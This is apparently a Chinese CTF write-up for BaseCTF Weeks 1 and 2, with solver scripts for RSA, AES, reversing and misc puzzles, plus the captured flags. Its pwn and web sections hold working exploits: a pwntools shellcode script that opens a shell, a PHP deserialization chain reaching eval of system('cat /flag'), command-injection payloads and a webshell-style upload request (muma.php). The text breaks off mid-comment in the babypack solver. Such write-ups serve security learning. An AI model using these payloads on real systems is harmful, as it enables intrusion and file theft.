# p1 is placed above bit 721 (presumably the leaked high bits of p).
pbar = (p1 << 721) + p0
PR.<x> = PolynomialRing(Zmod(n))
# Enumerate the 6 bits directly above the known low part; x then stands for
# the remaining unknown middle bits, which small_roots() searches for.
for i in range(64):
    f = (pbar + x * low_mod * 64 + i * low_mod).monic()
    pp = f.small_roots(X=2 ^ 453, beta=0.4)
    if pp:
        print("pp[0]=", pp[0])
        print("i=", i)
        break

# NOTE(review): if no iteration finds a root, pp is empty here and pp[0] raises.
p = pbar + pp[0] * 64 * low_mod + i * low_mod
print("p=", p)
# Textbook RSA decryption once p is known.
p = int(p)
q = n // p
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(c, d, n)
print(m)
print(long_to_bytes(m))

[Week2] random_primes

算欧拉

n = 7830066913409013785267827298582674855213522727663214124898704979203200630630221683891376427486630335320845020405630358730759021565836954615501136292870698724173849421954164089362403697815651250682846368067126348624362035733202997526264903698842967309948061245210880547470390892666637227608422794894555726566347821538570837778378857036563261604369233916512690518578078026696630654839066193396456919155813257074304956303413845468778428073751578664755437300206207350643301957671121688199711492288245959030011857332103740361088904116935837872325378568518546819511376953865460255796332456737453814409922838345409251358100167684494837153525387678341831358852775493216660506690107244512341939058281842129011449668530092630042821445751799028581993016411292873195254355112835345311544889627253488943089897242010606695167371664989825490117599061693207227413135281750043277124612004487700387822163583356687930304454104583403838899792634717993904476599858522591282557971641159256474201893157663783114701836405266928756832173078509439704854896692452161659255412375529795420422156310117023350005195050811190825333230643955663801621890303247071300980424060158508208704816206616908466264470737664715160835203605845949139451684689487841695195866805325513501327412542738098114586064306054175355811165716964293686026407025644180776671346029624960264375868603379775807112102024579775847256252492380163455318795927920442507772393930184034177999849220386911563553333166460810579591859315379683040060283630760221854206065562172465466345949166395974662466037861869649771350528031402915465475014424711154520375865461175898444792100434765779361784256487176962278484434115786148678708838495742453658150806758298922473424174235124991595148522524967004000120417185654759639742765888887999301365297133586182441608472543532793125677453497369843800359312219447411726939775222594859651437998889308923909470341094003541726894610023152226760572951937456677617102641042348690655649337084338631464947810670496847988178169536013202482
6936593194324539644886241562342997299649076507105518992946223028855705189458007533521138703343150937158114114218932400728424949936286443583797118636171187082834662757985896337364138817400612718422265665198024836586611857266616428913152399750688461692677751727389476785588380514444593900569311496880422405988762554852121131345538798688587092154717384294801026132314002251890156123191210398076704434510182202143578810771596233936298462366674592585338029819643973999567268938697218329734244529139548760101393715777276776940762681748317493543343685273831243829694914274003574509516149595004243952747746644961308054952235256037171151695870643020625268635139422461824974663101258586488528601193378268634713686606488503649923013225514905688326248009253372769118830036659383418890729585564557376820890036155588551064419189532686009173215470250197488274429655669070803391973941917017493224972246331391152287082983301776505925295294164201606063028946348118492358755684668733095242911870636074134633575423928967453742150728552560370847186174905012586984090885433727025000206871702482359563400504600567763564582739694873656581728461491373440639163666040518508819641244084238867282549191870081112768586762540287977817548140346798817430775010275964061529114139424317686620296832033309265702409802876815255731607798400127673166880859281784259402995434972992131101158600882460475931695668710417351337637612478180964570698492610372677176847071937542439765750578751925220375723373827393178629810215549480885217514819316424426943459039642952096990941480059597449017550988311939357225101582029418355438775525606571176735588489070335070244453533520858832311313682516805060002632168734723995449881138047136306876918900826798316113276424022400544205104057777588615149030045126315192448561606146254432070045197349283823967140032987449249831755565764939530383006495743
e = 0x010001
c = 1093256121418811691349633884423021356633978134292966489553874542781791238358295335426668415023166027954996625051420577493667824501649432869528057686451750288316816910397382629774298441937547233956753065529097877191699918039115202957337087658469098304374696277563020457331278140075969310150315715843020746656167994646063024677105714238622574336597601173953997036582942407796229805377339006787815702404915271846770376106312644390819144016155830513829761647568620243654068928415623802444953011361211378013499713469372806125474734994287518083907329841838337717556241874324440340626885553763322954232400855565339807071892321582386180978536483407197865884342435897670134641970372091590178581326892854820705050227840462139458418313478056939546089488178689697927788133612008061739961796780717135680690059059843521460548943400440075072549263642778142322553681107266326899389399400224420049958868630481920741293895509509786744023698063926664818702849276103941412666213912301512015982875337927624885673329513416992222855651023180889148449319496283772492522626881480405730489310544315066415406419791190663101607618436762339809465699249346219280236246798494923574248758432354732450859901402315454165220861852940020724189284384978436094976303046718818115920223875761763369205054892082583399430768426962644539683767683622215674622364530161306440520074932775203726898254313918302918158338893115967835907921400822151110065285755016823481526036112086877396184474779772672777884312990976267562132296839364269838737667955289273381304280292531609850947774380025541448760290985029328831136155532030110660328741793152955524993218772392841301083853407843632521944959421101063922926408630857942155173553265649994782728054809833578075255522763473867570242922191690258610960429527917825954799350243215320860648845823888406079144360733120892758516436394283721941074591992068709056978434144249946370176209580261992712491146585486352865467853012283982569783829897373148685163663183813646084064010686825626422454984021416402862
127889251773565118407053577546260937996800783904867497317512257427384881412920876851185681901360445996414854617735746124849305097724462381788049919520369827437945533718238301976608693210822883549849346914749712641177399278642094159972818771839223940037362062271618565492364129165948546330822175641999869293182574801410909568799887485687799830413460992606782188190161078789803079204468693865791568886757702397226751678303106993202727687413409748299454409517072068313199302592993167348776456703605936302216362148170559954097296263965296226759555059786981274338884349876203756741105449671416827010661253266421028866463837188482523849379185098341631154586750782372250753953789082447013115491415875557484766163997419331193733180948335725001700381759888109481542481560084404144004112246764995544553798311119720361550478239142333177065617369951724788288789091898104014990085985609531302672876148454755584802296948087896190960286862545509803680907635139069769773489974690789281850253441901658186053827023495071972754442328786102677924620742574365171969462047797683507872502560411636054630326651806741191565960549277521714122075001246821117983391397806797612028499867676071294152880791421912694378781390703123405056446531600817818157671340725736220061182015810279092548335683818151707498767164622121926625237321182816937233802267205025138008023815746402851176062360192537976175702542328058732539514446727425707394730057315691659046002877368113680075447504177622678838170749340265685373340874438362777036176293805138792214226140580946132386530852126980325547324038761178186444019589823730620635017784138099601753640268173837644549341739416563571709247391327046697023194351531203111048984847048754457714313305254115325718812624677601983165234723923006394872649966184045387413721873049174098054565879297120256469204258468893249797880459716409176351490537
primes = [255675877315683439181791416047922719357, 180461111025833129025002455435975940971,337490274732450824975483083220272824199, 304456281514261901091507788207898547903,254797576342247974393400562686432925229, 183131976400038388097951032415099792851,187104898097787470482482874168168046723, 300625339408843701719323023799725058313,293895810597575199851257228961757849961, 197370673648293754589174456296168807801,214231100175566513755789399545798257027, 299940533764670809123600295354236009687,329911008919678926860313614132444450849, 292789028093982326052555296040896616647,267992025172569093811940290026790452689, 192120589915828510906490323831586947847,208470412662206941915861109996165224771, 195723355777376859063723356742829282943,195479450259644250739997899829659598467, 225273608271867864202603965232709350643,297983612753980801299047698668400172129, 289863711883286870918208567358762217117,320181619705477005993614485764800027801, 274756647552045078797369358162815740121,208678800821922117897086572764543689257, 274510151199776127157320013074195989531,270061041585244138305865647463819178071, 231693016600939448457585159254864460211,221276763231716810367704255896280432977, 284588387935614601031451184436365997027,190107678698149330362585520776807817237, 244360771516251060479861295353775315223,184597108435320085388683362929647254859, 214993743235105601056961433866767506839,319622401044815459679561340300419077137, 312048738778225034570138647462191322423,192343262692325176379644178905323471293, 217411522139037534713431287902356703153,203269104665429435826852242437943175799, 197694542080431775212389192687346023837,170754527923440727794804968936874697237, 199565850096248778954713726823038799169,329479041983980219266962570620791190271, 336543942677902368237166971184411120319,296349049540412710059375861980880864529, 276958785496368109105253052397588113011,236061938563845834433725013690718000077, 175132351377019405283465079997063887583,210382170435243156571657554946080029177, 
179295658173078371976938970235081809653,221499702407155816778095037176350210511, 273750615951477382944958796366722325273,215400010676152024850087488645214675509, 242104770580865606729511928881839588399,237832832377832763447973839385045714547, 240569613888482344825828531593242970283,188780850815328211058185207879562258749, 236351101956411494065697625496351792553,234848091988225252588700833488573195973, 216111241348931999833159262144497816823,248635261568172677022024655836676274851, 175169438550312686771927355949990675153,222945249317916941175129207081724296809, 272123250140823727659430614318422459467,321040760103571995807993446246308239643, 244443756627073674223172405572152750757,231281757931881868821441147678670578293, 212608548905981265953338769409211557953,262334849743113291736207517444943890093, 221968375825210657749121344978372971509,284590253068157230941830678792449649633, 300977729071492709020945132474829506297,305429273614180801706392853095181679257, 335939257455017842008237083398243135951,294393337682220551877311202846160164539, 300751607582285572452649226924384213987,177342562402002655670186066181715938647, 314293624358674993004107306426510931177,192176341797009660053769692734114433539, 219685065300219568101641511794459670373,311600604660297404708381142674858758433, 189258688382892886748712093669349354607,265765352209342630144326504781080544103, 233694355945946803066419059858430846563,223443907562486442160842066195579310831, 182987294835928563972108625144731142337,214137187246441738588307243392955884313, 251175687278238637206326829923211055529,280606397834257483599650477170805542213, 233315167891969517243554909836441514543,189298893622248669462727814260415085983, 248568957395290350328195179867090245057,292645643756069284722532228739967572339, 179447399460747583275629697319304390429,179645924152591342445122478862459911921, 332356391092472452305991116186146584177,245901581082639772431455170863897420347, 
205817781083003905754490509387056092343,240380627852067724273161876175750141361, 268700167965406311300179029348879484383,213345040113356686319409599805587957227, 251674200978198716465773971152251242983,179180641720352444750737502831482762429, 306320532661676131438858609804319013343,256526510096408769263055362633154848279, 205959060854084755092268947433148347151,291927192797043538420569211955680836527, 204978877621419749982721876460562600659,332399656527167823296930534887330184167, 280595736375324905544725725979456898547,300213915091486506011056425480272542643, 318558817334795356700066397524785435681,319436460864579377450478049744976231249, 243133148342749788432705330633449318989,322207542584548294558453923911981520623, 320850760899167598764295789802781069077,319881693868123342340868542828982909581, 206495732343577870213482544631201066371,242791194590408310278390962600348350913, 251698935174714138851501858575403291023,336741296937713120832285756167770151171, 315930741679982320652758472398428972349,308738538640639393614807292598596283683, 242935142876894679332147837418000898919,320412254452324446540182603262368766623, 244141238875170898148081089385979949403,213402860730186872545578995830820087021, 257839149567099022202819187898373109541,205790643921760418513647126480621419031, 198756405484996593521220520853141427989,294805620517257214889752595599972901633, 255265348017204260362764409566933677153,274956788729771493245467759809121243433, 207307664273912902821847768063880326327,228782470653856387114481087524374601589, 327491405235009262853431015300186498577,173419211471119738399569200317219003511, 266492438299975532333886393820275910943,276688137488059756944807773426416608851, 189140053313243747387509835884240226891,184847492345401269770088588442458737119, 333210953053056282315216794932763359439,214889588455292527477541347807824233317, 215229626238372443203352172982941095611,321221012891336284787614820604143303369, 
199400757934809114495211412464158118397,178651685535715756785532928453093603903, 220776757717693008935011794749825325367,303675938617156800143972318322678387193, 327088681522055240658148530499087069577,335783766579434559780651762543581106409, 259404300424171457987268194257725139933,179840475811181163398944717514437142491, 297175485665739288479300848974745531391,237485053681467543059304786336620370377, 297758270183402970750961370350920892967,287801215974478613717591686806352676563, 310730027586487200761300572073383664977,276935537099897424875065059267639595933, 251308797428280999427269663339682237319,217181290779624781624389434069663308189, 278483889173395237559970658394075421689,204589549925569581630736863023597052269, 226032820526239722979885626335569166693,307616487066170583892695494367464641267, 222259520009563764167811735543215104543,264617923645991453974534495741056598021, 300871024629133281254211035867737539223,170303240421348821459663263562155031807, 194456703515031789312329705897177851253,327369717787718586651743316493134914089, 313093229847313153837631186419773330871,224824444829441039679277741769033772991, 224589292446640473576473771583959436463,214868884335325091682110394113205785173, 281852933308534953139887124628766315043,225661596373287038911910532148417025369, 197435393688129783450788260536037003399,266167151841181488476394288675916455947, 179215005575751890101294918245131012843,181845510055827963079718687867786713537, 257637102334933109362889675555405989789,211635849392838491382106919488103885767, 186185061420106956824801515596528043351,285418977308105637920637161558618377271, 333320927697115374794556799401253359593,188501857269628483380021948001960729951, 333805438111531260206119448902819218463,207203219305023873959844954660799240249, 243125622633677038874854389025310242579,216464412848635515952075334791481048513, 215209416857176076836597526059188595229,214612926530046226231879587951703041239, 
211839237456343309131155436452991652823,243378322702585683775212046627894119463, 300569560524099180847101362636309727649,277442530432004673254582623587364635427, 264039335285085705456044566498360689059,336941745040225044220256680095943361963, 294351957900120820634469984437616730183,193397784957516885417425615607279607259, 172625665034500456784052580259369183617,171214762299612221823796960282578324943, 194792374409055048312123241531481499583,214020514849615741103085838425694524869, 217152285242353248407824271751534124093,310504460995069986330272047239018516719, 257283037178296965441561511618312400677,196379023990504203398232036900292068109, 208338219265141175146204974249461481119,180313228114558484028748815066535513471, 293814076002148382129879416847624489347,217981245083649644743701945778358819867, 198894611219128734462943250308461071371,190754795019022912784187412387261424293, 273263914687122798746013275553691541621,319875887014797059887738138214903974573, 280433942775269696096083027024527213553,339832090471957335839878188583478605273, 245482340001475388718217992653932933781,195945871414379770821529324478394520901, 203621853598394319877751491201563422297,285527901432745514886361613743984147931, 284721811618834957831167749970526496317,327215978662725442740036051250620691291, 221299321558362891869402561537662340987,252585072729486722478056993406814970147, 280264567326332248237425051940201458271,241027648066340372998036400876879511133, 209093079608768177230455678431608454539,340235244837800791530469709812216931327, 318370869089270734010914463566452904391,218007259061353959833958121965586715759, 320702628326860753372843359167209806577,280574097974570759348625351607802595079, 228292038707075332622237132594473246261,246482905608669854259984848561724759323, 281771843261446623855706740146832822043,241444581355719829115072364769273312223, 309029268537775236744873599480649785803,293169195958605701684834829075351077843, 
240056552101889027428780330876207267181,206667506718454166578882634113592471317, 295377459264316749259598713099825801289,334341534141831513237527215426279900591, 263440016933436744959242384953581131709,327921668846632014434297416582771393151, 179743859120339282852666034250891124503,212172965192102954961276830300925726343, 325170702322845184523697390427992449689,271105603309076479942153666379400527383, 271642757529104184378772507234018239527,244844048330592276234702305193952823371, 270007525941420385852467420335121485863,290899364033417721623974853950097454643, 279919385326960469749295500025219756669]
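print(len(primes))
# NOTE(review): as rendered on this page the n and c literals above each
# appear to continue on a second line with no operator; the two halves have to
# be rejoined into one integer, otherwise n is truncated and the assert below
# fails.
tmp_n = n
new_list = []
# Trial-divide n by every candidate prime, taking each one out as many times
# as it divides (one pass with an inner loop instead of 999 full passes).
for prime in primes:
    while tmp_n % prime == 0:
        new_list.append(prime)
        tmp_n //= prime

print(new_list)
print(len(new_list))

# Sanity check: the collected factors must multiply back to n exactly.
cal_n = 1
for one in new_list:
    cal_n *= one
assert n == cal_n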


import gmpy2
# import libnum
from Crypto.Util.number import *

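# Euler's totient of n from its prime factorisation in new_list (built above).
# A prime p that occurs k times contributes p**(k-1) * (p-1). Walking the
# distinct primes applies that factor once; walking every occurrence would
# apply it k times and give a multiple of phi(n) instead of phi(n) itself.
phi = 1
for p in set(new_list):
    k = new_list.count(p)
    phi *= p ** (k - 1) * (p - 1)

print('phi', phi)
# If e and phi share a factor t, e has no inverse mod phi, so e // t is
# inverted instead; pow(c, d, n) is then m**t mod n and a t-th root is still
# needed. With t == 1 this is the ordinary d = e^-1 mod phi.
# gmpy2.invert raises ZeroDivisionError if e // t is still not coprime to phi.
t = gmpy2.gcd(e, phi)
print('t', t)
d = int(gmpy2.invert(e // t, phi))
print('d=', d)
m = pow(c, d, n)
print('c=', c)
print('n=', n)
print('m=', m)
print(hex(m))
print('m =', long_to_bytes(m))
print('-----------')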

pwn

[Week2] shellcode_level1

直接调syscall

from pwn import *

# Solver for the shellcode_level1 challenge service (pwntools).
target_path = './attachment'
target_elf = ELF(target_path)
# Take the architecture from the supplied binary so asm() assembles for it.
context(log_level='debug', arch=target_elf.arch, os='linux', binary=target_path)

conn = remote('challenge.basectf.fun', 39375)

# First send: a lone `syscall` instruction (the writeup's "call syscall directly").
stage_one = asm('syscall')
conn.send(stage_one)

# Second send: the same instruction followed by pwntools' shellcraft.sh() template.
stage_two = stage_one + asm(shellcraft.sh())
conn.send(stage_two)
conn.interactive()

web

[Week2] Really EZ POP

<?php
/**
 * Last link of the chain: holds a string of PHP code and evaluates it when the
 * object is converted to a string.
 *
 * The constructor overwrites the declared default, so an object serialized by
 * this script carries the value set there. NOTE(review): this presumably
 * mirrors the class in the challenge source; on the server the property value
 * comes from the unserialized data, not from this constructor.
 */
class Sink
{
    // Private, so the serialized form stores the property name together with the class name.
    private $cmd = 'echo 123;';

    public function __construct()
    {
        $this->cmd = 'system("cat /flag");';
    }

    public function __toString()
    {
        // eval() on a property is the dangerous sink: whoever controls the
        // serialized object controls the code that runs here.
        // NOTE(review): nothing is returned, so PHP will complain about the
        // missing string only after eval() has already executed.
        eval($this->cmd);
    }
}

/**
 * Callable wrapper around a Sink: invoking the object concatenates $word into
 * a string, which triggers Sink::__toString().
 */
class Shark
{
    private $word;

    public function __construct()
    {
        // Runs only when this script builds the payload; unserialize() does not call constructors.
        $this->word = new Sink();
    }

    public function __invoke()
    {
        // String concatenation forces the string conversion of $this->word.
        echo 'Shark says:' . $this->word;
    }
}

/**
 * Bridge between a property read and a function call: reading any undefined
 * property calls __get(), which invokes whatever is stored in $animal.
 */
class Sea
{
    public $animal;
    public function __get($name)
    {
        // $name is ignored; every undefined property read ends up calling $animal.
        $sea_ani = $this->animal;
        echo 'In a deep deep sea, there is a ' . $sea_ani();
    }
}

/**
 * Entry point of the chain: the destructor runs automatically when the object
 * is released and reads the undeclared property `see` on $sea.
 */
class Nature
{
    public $sea;

    public function __destruct()
    {
        // `see` is not declared on Sea, so this read is routed to Sea::__get().
        echo $this->sea->see;
    }
}

// Request data goes straight into unserialize() (apparently kept from the
// challenge source). The client therefore chooses which of the classes above
// are instantiated and which of their magic methods fire. Passing
// ['allowed_classes' => false] to unserialize(), or accepting a data-only
// format such as JSON, removes that control.
if ($_POST['nature']) {
    $nature = unserialize($_POST['nature']);
}

// Object graph: Nature -> Sea -> Shark; Shark's constructor adds the Sink.
$start = new Nature();
$start->sea = new Sea();
$start->sea->animal = new Shark();


// The serialized string is printed base64-encoded; presumably to keep the
// non-printable bytes around private property names intact when copying.
$payload = serialize($start);
echo base64_encode($payload);

[Week2] RCEisamazingwithspace

cmd=cat</flag

[Week2] 你听不到我的声音

http://challenge.basectf.fun:43174/flag

BaseCTF{f136e3c8-c1cc-4576-bce7-86cc71bf8f90}

POST / HTTP/1.1
Host: challenge.basectf.fun:43174
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

cmd=cp%20%2fflag%20flag

[Week2] 一起吃豆豆

BaseCTF{J5_gam3_1s_easy_t0_h4ck!!}

// Game over screen
        stage.createItem({
            x: game.width / 2,
            y: game.height * .35,
            draw: function (ctx) {
                // The text shown while _LIFE is truthy is only base64-encoded in
                // client-side code, so anyone reading the script can decode it
                // without playing; secrets do not belong in shipped JavaScript.
                var message = _LIFE ? atob("QmFzZUNURntKNV9nYW0zXzFzX2Vhc3lfdDBfaDRjayEhfQ==") : 'GAME OVER';
                ctx.fillStyle = '#FFF';
                ctx.font = 'bold 20px PressStart2P';
                ctx.textAlign = 'center';
                ctx.textBaseline = 'middle';
                ctx.fillText(message, this.x, this.y);
            }
        });

[Week2] ez_ser

BaseCTF{1ab1664b-3e08-4e93-96ca-76c06784babf}

// Build the nested object graph web -> re -> pwn -> Misc; the classes come from
// the challenge source and are not shown on this page. Objects are created in
// the same order as before so any constructor side effects stay unchanged.
$chain = new web();
$chain->kw = new re();
$chain->kw->chu0 = new pwn();
$chain->kw->chu0->dusk = "gods";
$chain->kw->chu0->over = new Misc();


// Print the raw serialized form, a blank line, then the URL-encoded form.
$serialized = serialize($chain);
echo "\n", $serialized, "\n\n", urlencode($serialized), "\n";

[Week2] Happy Birthday

D:\NewCtfApps\fastcoll_v1.0.0.5.exe -o 1.pdf 2.pdf

Week1

官方wp https://j0zr0js7k7j.feishu.cn/docx/U2dVdIOTCoLrp9xaYCrcEEbkndh?from=from_copylink

re

Upx mini

upx -d file.exe

QmFzZUNURntIYXYzX0BfZzBvZF90MW0zISEhfQ==

解码

You are good at ida.exe

函数里第一部分在main

第二部分在Second

第三部分在Interesting

Y0u_4Re_900d_47_id4

xor

key = bytes.fromhex('586E705B6B775E687A51657954627C577F634A7C664D796540766843')
enc = bytes.fromhex('01090525262D0B1D247A31201E493D674D5008252E6E053422403B25')

# The i-th ciphertext byte is XORed with the key read from its last byte
# backwards (both values are 28 bytes long), and the result is printed
# without a trailing newline.
print(''.join(chr(k ^ e) for k, e in zip(reversed(key), enc)), end='')

easy_maze

x$$$$$$$$$$$$$$
......$$$$$$$$$
.$.$$.$$.....$$
.$.$$$..$$$$.$$
.$$$...$$$$$.$$
.$$$.$..$.$$$$$
.$$$.$.$$...$$$
.....$....$.$$$
$$$$$$......$$$
$$$$$$.$$$$$$$$
$$$....$$...$$$
$$$.......$$$$$
$$$$$$$$$.$$.$$
$$$$$$$$$.$.$$$
$$$$$$........y

路径
sssssssddddwwwddsssssssdddsssddddd

'plz BaseCTF{lower.MD5{your path}} by 32bit',0
BaseCTF{131b7d6e60e8a34cb01801ae8de07efe}

BasePlus

lvfzBiZiOw7<lhF8dDOfEbmI]i@bdcZfEc^z>aD!

使用Cyberchef ,magic 秒解

BaseCTF{BA5e_DEcoD1N6_sEcr3t}

Misc

base

KFWUM6S2KVHFKUTOOQZVUVCGNJGUOMLMLAZVE5SYGJETAYZSKZVGIR22HE======

使用Cyberchef ,magic 秒解

BaseCTF{we1c0me_to_b4sectf}

x 你也喜欢圣物吗?

图片末尾RE9fWU9VX0tOT1dfRVpfTFNCPw==

DO_YOU_KNOW_EZ_LSB?

lsb得到

b1,rgb,lsb,xy .. text: "key=lud1_lud1"

解压得到 it is fake.zip

题目提示:

where_is_key.zip真的需要密码,再找找

看到假flag的同时,真flag已经出来了,再看看

用每个解压工具解,最后 bandizip成功解压。

根本进不去啊!

题目提示: 这个子域名没有绑定 A 解析到一个IP

dig txt flag.basectf.fun

海上遇到了鲨鱼

导出http

flag.php有逆序的flag

正着看还是反着看呢?

将文件字节逆序,末尾提取zip解压得flag

BaseCTF{h3ll0_h4cker}

人生苦短,我用Python

import base64
import hashlib

# Rebuild the 38-character flag position by position. '$' marks a position that
# has not been filled in yet; presumably each assignment below corresponds to
# one check in the challenge script (not shown on this page).
flag = ['$'] * 38
flag[:len('BaseCTF{')] = 'BaseCTF{'
flag[10:12] = 'Mp'
flag[-3:] = '3x}'
flag[8] = 's'
# Extended slice: positions 12, 16, 20, 24, 28 receive 'l', 's', 'T', '_', 'n'.
flag[12:32:4] = 'lsT_n'
flag[-11] = '4'
# lst = [14, 2, 6, 4, 8]
_lst = [14, 17, 24, 29]
for i in _lst:
    flag[i] = '_'

# b'MG1QbA==' decodes to '0mPl', which fills the four positions before '3x}'.
flag[-7:-3] = base64.b64decode(b'MG1QbA==').decode()
# Every 7th position counted from the end (37, 30, 23, 16, 9, 2) receives '}Crs1s'.
flag[::-7] = bytes.fromhex('7d4372733173').decode()
# The byte values spell 't3r_Th'.
flag[21:27] = bytes([116, 51, 114, 95, 84, 104]).decode()
flag[13] = '3'
flag[15] = '1'

from itertools import product
import string

# Recover the two characters at flag[18:20] by exhaustive search: '_' followed
# by the two candidates is read as little-endian digits in base 20240815 and
# compared with the known total. Every printable pair is tried; a matching
# pair is written into the flag.
BASE = 2024_08_15
TARGET = 41378751114180610
alphabet = string.printable
for first, second in product(alphabet, repeat=2):
    candidate = first + second
    weighted = sum(ord(ch) * BASE ** pos for pos, ch in enumerate('_' + candidate))
    if weighted == TARGET:
        flag[18:20] = candidate
print(''.join(flag))

web

[Week1] HTTP 是什么呀

POST /?basectf=we1c%2500me HTTP/1.1

Host: challenge.basectf.fun:24925

Upgrade-Insecure-Requests: 1

User-Agent: Base

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Cookie:c00k13=i can't eat it

Referer:Base

X-Forwarded-For: 127.0.0.1

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 9

Base=fl@g

[Week1] 喵喵喵´•ﻌ•`

[http://challenge.basectf.fun:36854/?DT=system('cat /flag');](http://challenge.basectf.fun:36854/?DT=system('cat /flag');)

[Week1] md5绕过欸

POST /?name=QNKCDZO&name2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2 HTTP/1.1

Host: challenge.basectf.fun:42219

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 221

password=240610708&password2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

[Week1] A Dark Room

[Week1] upload

POST / HTTP/1.1

Host: challenge.basectf.fun:44920

Content-Length: 9773

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://challenge.basectf.fun:44920

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykhdNxJMpFlddi1AA

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://challenge.basectf.fun:44920/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

------WebKitFormBoundarykhdNxJMpFlddi1AA

Content-Disposition: form-data; name="file"; filename="muma.php"

Content-Type: image/jpeg

...

c4QESl٫��

------WebKitFormBoundarykhdNxJMpFlddi1AA--

CRY

[Week1] helloCrypto

from Crypto.Util.number import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# The AES key is given as an integer and converted to its raw bytes.
KEY_AS_INT = 208797759953288399620324890930572736628
ciphertext = b'U\xcd\xf3\xb1 r\xa1\x8e\x88\x92Sf\x8a`Sk],\xa3(i\xcd\x11\xd0D\x1edd\x16[&\x92@^\xfc\xa9(\xee\xfd\xfb\x07\x7f:\x9b\x88\xfe{\xae'

# ECB takes no IV, so with the key known decryption is a single call; the
# printed plaintext still carries whatever padding was applied at encryption.
cipher = AES.new(key=long_to_bytes(KEY_AS_INT), mode=AES.MODE_ECB)
print(cipher.decrypt(ciphertext))

BaseCTF{b80bf679-1869-4fde-b3f9-d51b872d31fb}

[Week1] ez_math


[Week1] 你会算md5吗

import hashlib
import string

output = ['9d5ed678fe57bcca610140957afab571', '0cc175b9c0f1b6a831c399e269772661', '03c7c0ace395d80182db07ae2c30f034', 'e1671797c52e15f763380b45e841ec32', '0d61f8370cad1d412f80b84d143e1257', 'b9ece18c950afbfa6b0fdbfa4ff731d3', '800618943025315f869e4e1f09471012', 'f95b70fdc3088560732a5ac135644506', '0cc175b9c0f1b6a831c399e269772661', 'a87ff679a2f3e71d9181a67b7542122c', '92eb5ffee6ae2fec3ad71c777531578f', '8fa14cdd754f91cc6554c9e71929cce7', 'a87ff679a2f3e71d9181a67b7542122c', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '0cc175b9c0f1b6a831c399e269772661', 'e4da3b7fbbce2345d7772b0674a318d5', '336d5ebc5436534e61d16e63ddfca327', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '8fa14cdd754f91cc6554c9e71929cce7', '8fa14cdd754f91cc6554c9e71929cce7', '45c48cce2e2d7fbdea1afc51c7c6ad26', '336d5ebc5436534e61d16e63ddfca327', 'a87ff679a2f3e71d9181a67b7542122c', '8f14e45fceea167a5a36dedd4bea2543', '1679091c5a880faf6fb5e6087eb1b2dc', 'a87ff679a2f3e71d9181a67b7542122c', '336d5ebc5436534e61d16e63ddfca327', '92eb5ffee6ae2fec3ad71c777531578f', '8277e0910d750195b448797616e091ad', '0cc175b9c0f1b6a831c399e269772661', 'c81e728d9d4c2f636f067f89cc14862c', '336d5ebc5436534e61d16e63ddfca327', '0cc175b9c0f1b6a831c399e269772661', '8fa14cdd754f91cc6554c9e71929cce7', 'c9f0f895fb98ab9159f51fd0297e236d', 'e1671797c52e15f763380b45e841ec32', 'e1671797c52e15f763380b45e841ec32', 'a87ff679a2f3e71d9181a67b7542122c', '8277e0910d750195b448797616e091ad', '92eb5ffee6ae2fec3ad71c777531578f', '45c48cce2e2d7fbdea1afc51c7c6ad26', '0cc175b9c0f1b6a831c399e269772661', 'c9f0f895fb98ab9159f51fd0297e236d', '0cc175b9c0f1b6a831c399e269772661', 'cbb184dd8e05c9709e5dcaedaa0495cf']

# Hashing one character at a time leaves only len(string.printable) possible
# digests, so a precomputed table reverses every hash in `output`.
db = {ch: hashlib.md5(ch.encode()).hexdigest() for ch in string.printable}
print(db)

# Reverse table: digest -> character. Digests that match no printable
# character are skipped.
by_digest = {digest: ch for ch, digest in db.items()}
result = "".join(by_digest[item] for item in output if item in by_digest)
print(result)
# BaseCTF{a4bf43a5-3ff9-4764-bda2-af8ee4db9a8a}

[Week1] babypack

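# Walk the weights in `a`; each weight still smaller than the remaining target
# `c` is subtracted and recorded as '1', every other weight as '0'.
# NOTE(review): this looks like the greedy decode of a super-increasing
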